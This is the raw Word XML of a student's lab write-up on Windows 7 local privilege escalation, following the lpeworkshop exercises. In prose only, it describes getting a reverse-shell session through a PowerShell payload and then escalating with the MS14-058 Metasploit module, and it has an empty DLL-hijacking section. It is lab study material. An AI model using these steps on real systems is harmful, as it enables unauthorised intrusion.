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D9AE" w14:textId="2DFC1A95" w:rsidR="00426DBF" w:rsidRDefault="00001D69" w:rsidP="00001D69">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00001D69">
        <w:t>Windows Local Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B948A17" w14:textId="4C826487" w:rsidR="00001D69" w:rsidRDefault="00001D69" w:rsidP="00001D69"/>
    <w:p w14:paraId="41577685" w14:textId="79E1C153" w:rsidR="00001D69" w:rsidRDefault="00001D69" w:rsidP="00001D69">
      <w:r>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00593C43">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/sagishahar/lpeworkshop</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C27AC5" w14:textId="70E0FB7F" w:rsidR="00001D69" w:rsidRDefault="00001D69" w:rsidP="00001D69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3771CC6D" wp14:editId="583D70C5">
            <wp:extent cx="5943600" cy="1398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98270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A00F17" w14:textId="77777777" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69"/>
    <w:p w14:paraId="021D2510" w14:textId="25A4AD7B" w:rsidR="00001D69" w:rsidRDefault="00001D69" w:rsidP="00001D69">
      <w:r>
        <w:t>While preparation the VM, batch file gives me some output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EB8C6" w14:textId="16E13097" w:rsidR="00001D69" w:rsidRDefault="00001D69" w:rsidP="00001D69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74B2D577" wp14:editId="7762205F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3642360" cy="31546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2360" cy="3154680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD3EB02" w14:textId="77777777" w:rsidR="00001D69" w:rsidRDefault="00001D69" w:rsidP="00001D69"/>
    <w:p w14:paraId="5B6B6727" w14:textId="5930E066" w:rsidR="00001D69" w:rsidRDefault="00001D69" w:rsidP="00001D69"/>
    <w:p w14:paraId="431D8418" w14:textId="5955CDB6" w:rsidR="00001D69" w:rsidRDefault="00001D69" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>My windows 7 version Details</w:t>
      </w:r>
      <w:r w:rsidR="001F4021">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1A685" w14:textId="5F1E0944" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E566473" w14:textId="73585515" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC50782" w14:textId="07BDC9E4" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F6E422" w14:textId="189A9797" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB627E9" w14:textId="50260E5A" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F018483" w14:textId="58456C0E" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A4F4673" w14:textId="4E4EA329" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D63FA0" w14:textId="5E994722" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394ADADD" w14:textId="71AF8E93" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>This VM details same as above windows version mentioned in his git hub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443230E" w14:textId="2920DA93" w:rsidR="001F4021" w:rsidRDefault="001F4021" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12126C33" wp14:editId="37AA5AAE">
            <wp:extent cx="4892040" cy="53873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2040" cy="5387340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6500D23B" w14:textId="4280F74D" w:rsidR="000853BF" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F3BBA33" wp14:editId="0815D1C1">
            <wp:extent cx="5082540" cy="5135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2540" cy="5135880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C0DF3" w14:textId="77777777" w:rsidR="001D1191" w:rsidRDefault="001D1191" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0368CB5C" w14:textId="11737EE6" w:rsidR="003F6761" w:rsidRDefault="001D1191" w:rsidP="001D1191">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 1 – Kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7FBD3" w14:textId="74CF9827" w:rsidR="00044879" w:rsidRDefault="00044879" w:rsidP="00044879">
      <w:r>
        <w:t xml:space="preserve">For this exercise we </w:t>
      </w:r>
      <w:r w:rsidR="0053573A">
        <w:t>must</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> do null pointer (MS14-058) kernel exploit so we use sherlock.ps1 for find the vulnerabilities.  </w:t>
      </w:r>
      <w:r w:rsidR="0053573A">
        <w:t xml:space="preserve">And I search that vulnerability using “searchsploit” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D68EB7" wp14:editId="4372F8CC">
            <wp:extent cx="5943600" cy="418846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88460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0D0FFF" w14:textId="64778B03" w:rsidR="0053573A" w:rsidRDefault="0053573A" w:rsidP="00044879">
      <w:r>
        <w:t xml:space="preserve">That module required Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="009C454E">
        <w:t>framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268AB0CF" w14:textId="3978E0F4" w:rsidR="0053573A" w:rsidRDefault="0053573A" w:rsidP="00044879">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A228F01" wp14:editId="56E6F19A">
            <wp:extent cx="5943600" cy="303348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0425" cy="3042073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5AD0D9" w14:textId="591CE81A" w:rsidR="0053573A" w:rsidRDefault="009C454E" w:rsidP="00044879">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F4B750" wp14:editId="614F65D5">
            <wp:extent cx="6363970" cy="3214914"/>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9752" cy="3227938"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45010A82" w14:textId="36EA9549" w:rsidR="009C454E" w:rsidRDefault="00E4567C" w:rsidP="00044879">
      <w:r>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00D926CB">
        <w:t xml:space="preserve"> this module need session do the exploit. </w:t>
      </w:r>
      <w:r>
        <w:t>And we have only option is PowerShell, so we use PowerShell to interact with the victim machine</w:t>
      </w:r>
      <w:r w:rsidR="00BA1630">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7B5F5" w14:textId="4A5C9564" w:rsidR="00E4567C" w:rsidRPr="00044879" w:rsidRDefault="00E4567C" w:rsidP="00044879">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CDBF3F2" wp14:editId="0CBFF2E8">
            <wp:extent cx="6363970" cy="3519715"/>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9182" cy="3528128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE9639" w14:textId="77777777" w:rsidR="003F6761" w:rsidRDefault="003F6761" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501629E5" w14:textId="77777777" w:rsidR="003F6761" w:rsidRDefault="003F6761" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFBE310" w14:textId="77777777" w:rsidR="003F6761" w:rsidRDefault="003F6761" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8874CB" w14:textId="5E71AC18" w:rsidR="003F6761" w:rsidRDefault="00BA1630" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D4E914C" wp14:editId="74D0AA8B">
            <wp:extent cx="6538686" cy="30695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3612" cy="3071903"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4076F" w14:textId="77777777" w:rsidR="00803759" w:rsidRDefault="00803759" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D66074B" w14:textId="0E89DCA8" w:rsidR="001D1191" w:rsidRDefault="00BA1630" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47C151F3" wp14:editId="2985DDF3">
            <wp:extent cx="6567170" cy="1342572"/>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15152" cy="1352381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2DF8A" w14:textId="7A6060E2" w:rsidR="00803759" w:rsidRDefault="00803759" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">After that powershell code copy to windows 7 vm it automaticaly hide the cmd and connect back to the attacker machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC4E96" w14:textId="70B9F016" w:rsidR="00803759" w:rsidRDefault="00BA1630" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A38DBC9" wp14:editId="632C6B82">
            <wp:extent cx="6567170" cy="921658"/>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7889" cy="930180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B1F74B" w14:textId="30B2D46B" w:rsidR="00803759" w:rsidRDefault="00803759" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Windows VM is x64 therefore it is required to migrate to an x64 process, in that we use windows explore to migrate it, that session use to “ms14_058_track_popup_menu”, because that want session </w:t>
      </w:r>
      <w:r w:rsidR="000A762B">
        <w:t>id and target Id.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we create another session </w:t>
      </w:r>
      <w:r w:rsidR="000A762B">
        <w:t>for get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A762B">
        <w:t>the reverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell from windows 7 machine</w:t>
      </w:r>
      <w:r w:rsidR="000A762B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16191006" w14:textId="0870A221" w:rsidR="00BA1630" w:rsidRDefault="00BA1630" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6408933E" wp14:editId="6329B9F9">
            <wp:extent cx="6582229" cy="393192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90552" cy="3936892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24616E2D" w14:textId="659445EE" w:rsidR="00B61AB4" w:rsidRDefault="000A762B" w:rsidP="000A762B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="298EE927" wp14:editId="0C0C8C66">
            <wp:extent cx="6560185" cy="408577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3771" cy="4094232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D1191">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00853426">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="778B1896" wp14:editId="4B8745DC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-632460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7109460" cy="39852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09460" cy="3985260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Ex</w:t>
      </w:r>
      <w:r w:rsidRPr="00B61AB4">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>ercise</w:t>
      </w:r>
      <w:r w:rsidR="00B61AB4" w:rsidRPr="00B61AB4">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 – Services (DLL Hijacking</w:t>
      </w:r>
      <w:r w:rsidR="00B61AB4" w:rsidRPr="00B61AB4">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8EC53C" w14:textId="76317871" w:rsidR="001E2D08" w:rsidRDefault="001E2D08" w:rsidP="001E2D08"/>
    <w:p w14:paraId="62E68BBF" w14:textId="418C129A" w:rsidR="001E2D08" w:rsidRDefault="001E2D08" w:rsidP="001E2D08"/>
    <w:p w14:paraId="35B26D38" w14:textId="77777777" w:rsidR="001E2D08" w:rsidRPr="001E2D08" w:rsidRDefault="001E2D08" w:rsidP="001E2D08"/>
    <w:p w14:paraId="30E6B935" w14:textId="77777777" w:rsidR="00D629C4" w:rsidRPr="00D629C4" w:rsidRDefault="00D629C4" w:rsidP="00D629C4"/>
    <w:p w14:paraId="6D468B19" w14:textId="46DFE6F2" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00853426"/>
    <w:p w14:paraId="5A88F737" w14:textId="771DC37E" w:rsidR="00E44591" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034FFA7A" w14:textId="77777777" w:rsidR="00B61AB4" w:rsidRDefault="00B61AB4" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A2603C" w14:textId="34529206" w:rsidR="00E44591" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB8BACF" w14:textId="6FE36DBD" w:rsidR="00E44591" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F5E400" w14:textId="2E387CB0" w:rsidR="00E44591" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4814379E" w14:textId="4AA68469" w:rsidR="00E44591" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71328C14" w14:textId="77777777" w:rsidR="00E44591" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5016BCC8" w14:textId="1355355A" w:rsidR="00E44591" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46EC785D" w14:textId="77777777" w:rsidR="00E44591" w:rsidRDefault="00E44591" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2237DF94" w14:textId="6EDE62F1" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18ACC381" wp14:editId="6B6EE89F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-647700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>283210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7094220" cy="36703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94220" cy="3670300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D629C4">
        <w:t xml:space="preserve">privileges for logged user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1644D" w14:textId="18DF0424" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAE8D9A" w14:textId="0CEDF7CC" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20480528" w14:textId="05FAA447" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7CFBF9" w14:textId="04DB8AE7" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756C74BD" w14:textId="5CC77909" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7B2A34" w14:textId="6F0F0838" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBB4BF3" w14:textId="625D69A4" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AA938B" w14:textId="0EEB029B" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CFB63E" w14:textId="038F62BC" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECB8397" w14:textId="508401A9" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73408702" w14:textId="0D885708" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427F98C3" w14:textId="341435ED" w:rsidR="00853426" w:rsidRDefault="00853426" w:rsidP="00001D69">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6132"/>
        </w:tabs>
      </w:pPr>
    </w:p>
